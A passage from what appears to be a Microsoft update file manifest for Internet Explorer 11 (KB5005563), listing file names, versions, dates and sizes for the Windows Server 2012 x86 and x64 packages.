\nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 521,583 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 420,082 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:33| 436,651 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:33| 436,651 \ninetres.admx| Not versioned| 11-Jan-2021| 19:24| 1,678,023 \ninetcomm.dll| 6.3.9600.20112| 13-Aug-2021| 19:17| 675,328 \nINETRES.dll| 6.3.9600.16384| 21-Aug-2013| 20:15| 84,480 \njscript9.dll| 11.0.9600.20112| 13-Aug-2021| 19:13| 3,571,712 \njscript9diag.dll| 11.0.9600.20045| 4-Jun-2021| 21:23| 557,568 \njscript.dll| 5.8.9600.20112| 13-Aug-2021| 19:31| 516,096 \nvbscript.dll| 5.8.9600.20112| 13-Aug-2021| 19:37| 403,968 \n \n### **Windows Server 2012**\n\n### \n\n__\n\nInternet Explorer 11 on all supported x86-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nFileinfo.xml| Not Applicable| 20-Aug-21| 0:38| 590,629 \nIe11-windows6.2-kb5005563-x86-express.cab| Not Applicable| 19-Aug-21| 23:14| 726,202 \nIe11-windows6.2-kb5005563-x86.msu| Not Applicable| 19-Aug-21| 22:46| 27,627,035 \nIe11-windows6.2-kb5005563-x86.psf| Not Applicable| 19-Aug-21| 22:59| 184,419,043 \nPackageinfo.xml| Not Applicable| 20-Aug-21| 0:38| 1,133 \nPackagestructure.xml| Not Applicable| 20-Aug-21| 0:38| 149,422 \nPrebvtpackageinfo.xml| Not Applicable| 20-Aug-21| 0:38| 573 \nIe11-windows6.2-kb5005563-x86.cab| Not Applicable| 19-Aug-21| 22:35| 27,497,280 \nIe11-windows6.2-kb5005563-x86.xml| Not Applicable| 19-Aug-21| 22:39| 450 \nWsusscan.cab| Not Applicable| 19-Aug-21| 22:42| 173,732 \nUrlmon.dll| 11.0.9600.20112| 14-Aug-21| 2:19| 1,342,976 \nIexplore.exe| 11.0.9600.20112| 19-Aug-21| 18:56| 810,384 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 46,592 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 52,736 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 56,320 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 57,856 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 54,272 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 47,616 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 49,152 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 55,296 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 45,056 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 51,712 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 51,712 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 53,248 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 39,424 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 35,840 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 50,176 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 50,688 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 52,736 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 53,760 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 54,272 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 54,272 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 52,736 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 53,248 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 52,736 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 51,712 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 50,688 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 50,688 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 50,176 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 30,720 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 30,720 \nInetcpl.cpl| 11.0.9600.20112| 14-Aug-21| 2:35| 2,058,752 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 307,200 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 293,888 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 290,304 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 289,280 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 299,008 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 303,104 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:58| 282,112 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 296,960 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 283,648 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 291,840 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 299,520 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 275,968 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 290,816 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 293,376 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 296,960 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 258,048 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 256,512 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 289,280 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 288,256 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 285,184 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 295,424 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 297,472 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 292,864 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 295,424 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 294,400 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 294,400 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 292,864 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 290,816 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 288,768 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 286,208 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 281,600 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 286,720 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 292,352 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 242,176 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 243,200 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 46,080 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 50,176 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 48,640 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 49,664 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 51,712 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 54,272 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 50,176 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 47,616 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 49,152 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 50,688 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 45,056 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 49,152 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 49,152 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 49,664 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 39,936 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 39,424 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 47,616 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 48,640 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 51,200 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 50,688 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 49,664 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 50,176 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 49,152 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 48,640 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 50,176 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 48,640 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 49,664 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 48,640 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 48,128 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 49,152 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 48,128 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 35,328 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 35,328 \nJsproxy.dll| 11.0.9600.20112| 14-Aug-21| 2:58| 47,104 \nWininet.dll| 11.0.9600.20112| 14-Aug-21| 2:27| 4,387,840 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 114,176 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 130,560 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 124,928 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 122,880 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 130,048 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 138,240 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 20:58| 114,688 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 131,584 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 117,760 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 122,368 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 134,144 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 107,008 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 123,392 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 127,488 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 128,512 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 88,576 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 82,944 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 125,440 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 123,392 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 120,320 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 130,560 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 129,024 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 125,952 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 129,024 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 128,000 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 123,904 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 129,024 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 123,904 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 124,416 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 121,856 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 115,712 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 123,904 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 125,440 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 72,704 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 73,728 \nMsfeedsbs.dll| 11.0.9600.20112| 14-Aug-21| 2:42| 52,736 \nMsfeedsbs.mof| Not Applicable| 14-Aug-21| 1:11| 1,574 \nMsfeedssync.exe| 11.0.9600.20112| 14-Aug-21| 3:04| 11,776 \nMicrosoft-windows-ie-htmlrendering.ptxml| Not Applicable| 14-Aug-21| 1:03| 3,228 \nMshtml.dll| 11.0.9600.20112| 14-Aug-21| 3:33| 20,294,144 \nMshtml.tlb| 11.0.9600.20112| 14-Aug-21| 3:13| 2,724,864 \nIeproxy.dll| 11.0.9600.20112| 14-Aug-21| 2:14| 310,784 \nIeshims.dll| 11.0.9600.20112| 14-Aug-21| 2:18| 290,304 \nIertutil.dll| 11.0.9600.20112| 14-Aug-21| 3:07| 2,308,608 \nSqmapi.dll| 6.2.9200.16384| 19-Aug-21| 18:56| 228,256 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 2,066,432 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 2,121,216 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 2,075,648 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 2,063,872 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 2,314,240 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 2,390,528 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:58| 2,033,152 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 2,307,584 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 2,255,872 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 2,061,312 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 2,326,016 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 2,019,840 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 2,071,040 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 2,082,816 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 2,307,584 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 2,170,368 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 2,153,984 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 2,291,712 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 2,283,520 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 2,052,096 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 2,301,952 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 2,093,056 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 2,075,648 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 2,299,392 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 2,094,592 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 2,316,800 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 2,305,536 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 2,278,912 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 2,285,568 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 2,060,288 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 2,315,776 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 2,279,424 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 2,324,992 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 2,098,176 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 1,890,304 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:20| 1,890,304 \nIeframe.dll| 11.0.9600.20112| 14-Aug-21| 2:47| 13,881,856 \nIeframe.ptxml| Not Applicable| 14-Aug-21| 1:03| 24,486 \nInetres.adml| Not Applicable| 19-Aug-21| 18:57| 463,373 \nInetres.adml| Not Applicable| 19-Aug-21| 18:57| 751,311 \nInetres.adml| Not Applicable| 19-Aug-21| 18:58| 526,343 \nInetres.adml| Not Applicable| 19-Aug-21| 18:59| 499,704 \nInetres.adml| Not Applicable| 19-Aug-21| 18:59| 552,387 \nInetres.adml| Not Applicable| 19-Aug-21| 19:00| 944,608 \nInetres.adml| Not Applicable| 19-Aug-21| 20:58| 457,561 \nInetres.adml| Not Applicable| 19-Aug-21| 19:01| 543,999 \nInetres.adml| Not Applicable| 19-Aug-21| 19:01| 751,450 \nInetres.adml| Not Applicable| 19-Aug-21| 19:02| 526,608 \nInetres.adml| Not Applicable| 19-Aug-21| 19:03| 575,885 \nInetres.adml| Not Applicable| 19-Aug-21| 19:04| 463,373 \nInetres.adml| Not Applicable| 19-Aug-21| 19:04| 751,280 \nInetres.adml| Not Applicable| 19-Aug-21| 19:05| 570,788 \nInetres.adml| Not Applicable| 19-Aug-21| 19:05| 548,169 \nInetres.adml| Not Applicable| 19-Aug-21| 19:06| 639,283 \nInetres.adml| Not Applicable| 19-Aug-21| 19:07| 525,516 \nInetres.adml| Not Applicable| 19-Aug-21| 19:08| 751,436 \nInetres.adml| Not Applicable| 19-Aug-21| 19:08| 751,502 \nInetres.adml| Not Applicable| 19-Aug-21| 19:09| 488,537 \nInetres.adml| Not Applicable| 19-Aug-21| 19:10| 548,544 \nInetres.adml| Not Applicable| 19-Aug-21| 19:10| 559,394 \nInetres.adml| Not Applicable| 19-Aug-21| 19:11| 535,116 \nInetres.adml| Not Applicable| 19-Aug-21| 19:12| 541,503 \nInetres.adml| Not Applicable| 19-Aug-21| 19:12| 751,424 \nInetres.adml| Not Applicable| 19-Aug-21| 19:13| 804,520 \nInetres.adml| Not Applicable| 19-Aug-21| 19:14| 751,417 \nInetres.adml| Not Applicable| 19-Aug-21| 19:14| 751,408 \nInetres.adml| Not Applicable| 19-Aug-21| 19:15| 751,145 \nInetres.adml| Not Applicable| 19-Aug-21| 19:16| 503,958 \nInetres.adml| Not Applicable| 19-Aug-21| 19:16| 751,433 \nInetres.adml| Not Applicable| 19-Aug-21| 19:17| 521,634 \nInetres.adml| Not Applicable| 19-Aug-21| 19:17| 751,363 \nInetres.adml| Not Applicable| 19-Aug-21| 19:18| 420,094 \nInetres.adml| Not Applicable| 19-Aug-21| 19:19| 436,663 \nInetres.admx| Not Applicable| 21-Mar-21| 4:22| 1,678,023 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 29,184 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 32,768 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 35,328 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 37,888 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:57| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 34,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 34,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 27,648 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 34,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 33,792 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 23,040 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 22,016 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 31,232 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 34,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 35,840 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 32,768 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 34,816 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 32,256 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 32,768 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 30,720 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 16,384 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 16,896 \nJscript9.dll| 11.0.9600.20112| 14-Aug-21| 2:52| 4,119,040 \nJscript9diag.dll| 11.0.9600.20112| 14-Aug-21| 2:55| 620,032 \nJscript.dll| 5.8.9600.20112| 14-Aug-21| 2:56| 653,824 \nVbscript.dll| 5.8.9600.20112| 14-Aug-21| 3:04| 498,176 \nPackage.cab| Not Applicable| 19-Aug-21| 22:40| 300,569 \n \n### \n\n__\n\nInternet Explorer 11 on all supported x64-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nFileinfo.xml| Not versioned| 20-Aug-21| 1:18| 918,967 \nIe11-windows6.2-kb5005563-x64-express.cab| Not versioned| 19-Aug-21| 23:17| 1,228,067 \nIe11-windows6.2-kb5005563-x64.msu| Not versioned| 19-Aug-21| 22:49| 48,216,838 \nIe11-windows6.2-kb5005563-x64.psf| Not versioned| 19-Aug-21| 23:05| 282,897,531 \nPackageinfo.xml| Not versioned| 20-Aug-21| 1:18| 1,228 \nPackagestructure.xml| Not versioned| 20-Aug-21| 1:18| 239,770 \nPrebvtpackageinfo.xml| Not versioned| 20-Aug-21| 1:18| 652 \nIe11-windows6.2-kb5005563-x64.cab| Not versioned| 19-Aug-21| 22:39| 48,118,529 \nIe11-windows6.2-kb5005563-x64.xml| Not versioned| 19-Aug-21| 22:39| 452 \nWsusscan.cab| Not versioned| 19-Aug-21| 22:44| 175,450 \nUrlmon.dll| 11.0.9600.20112| 14-Aug-21| 2:28| 1,562,624 \nIexplore.exe| 11.0.9600.20112| 19-Aug-21| 20:26| 810,376 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:27| 46,592 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:28| 52,736 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:28| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:29| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:30| 56,320 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:30| 57,856 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 21:32| 49,664 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:31| 54,272 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:32| 47,616 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:32| 49,152 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:33| 55,296 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:34| 45,056 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:34| 51,712 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:35| 51,712 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:36| 53,248 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:37| 39,424 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:37| 35,840 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:38| 50,176 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:38| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:39| 50,688 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:39| 52,736 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:40| 53,760 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:41| 54,272 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:42| 52,736 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:43| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:43| 53,248 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:44| 52,736 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:44| 51,712 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:45| 50,688 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:46| 50,688 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:46| 50,176 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:47| 50,176 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:48| 30,720 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:49| 30,720 \nInetcpl.cpl| 11.0.9600.20112| 14-Aug-21| 2:40| 2,132,992 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:27| 307,200 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:28| 293,888 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:28| 290,304 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:29| 289,280 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:30| 299,008 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:30| 303,104 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 21:32| 282,112 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:31| 296,960 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:32| 283,648 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:32| 291,840 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:33| 299,520 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:34| 275,968 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:35| 290,816 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:35| 293,376 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:36| 296,960 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:36| 258,048 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:37| 256,512 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:38| 289,280 \nMshtml.dll.mui| 